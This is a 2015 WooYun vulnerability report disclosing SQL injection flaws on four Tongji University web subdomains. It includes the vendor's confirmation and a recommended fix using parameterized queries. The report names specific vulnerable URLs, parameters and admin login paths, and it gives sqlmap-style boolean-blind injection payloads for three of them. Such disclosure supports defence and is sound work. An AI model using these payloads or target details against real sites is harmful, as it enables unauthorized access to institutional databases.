当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120659

漏洞标题:同济大学某站sql注入打包

相关厂商:同济大学

漏洞作者: Aerfa21

提交时间:2015-06-15 18:29

修复时间:2015-07-30 19:38

公开时间:2015-07-30 19:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向核心白帽子及相关领域专家公开
2015-07-05: 细节向普通白帽子公开
2015-07-15: 细节向实习白帽子公开
2015-07-30: 细节向公众公开

简要描述:

本来是批量进行的,但是去重以后,存在sql注入的站点就剩四个。
没碰过数据,仅点到为止。

详细说明:

0x01 信息与通信工程系 comm.tongji.edu.cn/admin/Login.asp


comm.tongji.edu.cn/Ch/kyview.asp?ID=21
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=21 AND 2028=2028
---


xinxi1.png


0x02 精品课程网 jpkc.tongji.edu.cn/jpkc/hltjgjbyl/admin/login.asp


jpkc.tongji.edu.cn/jpkc/hltjgjbyl/teacherinfo.asp?id=8
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 2931=2931
---


2.png


0x03 新农村发展研究院


agri.tongji.edu.cn/Search.aspx?search=
---
Place: GET
Parameter: search
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=%' AND 4344=4344 AND '%'='
---

3.png


0x04 计算机科学与技术系 cs.tongji.edu.cn/administrator/index.php


cs.tongji.edu.cn/index.php?format=feed&type=rss


4.png

漏洞证明:

如上

修复方案:

参数化查询

版权声明:转载请注明来源 Aerfa21@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-15 19:37

厂商回复:

刚才对前面2个漏洞做了验证,属实。感谢上报漏洞并提醒。

最新状态:

暂无


漏洞评价:

评论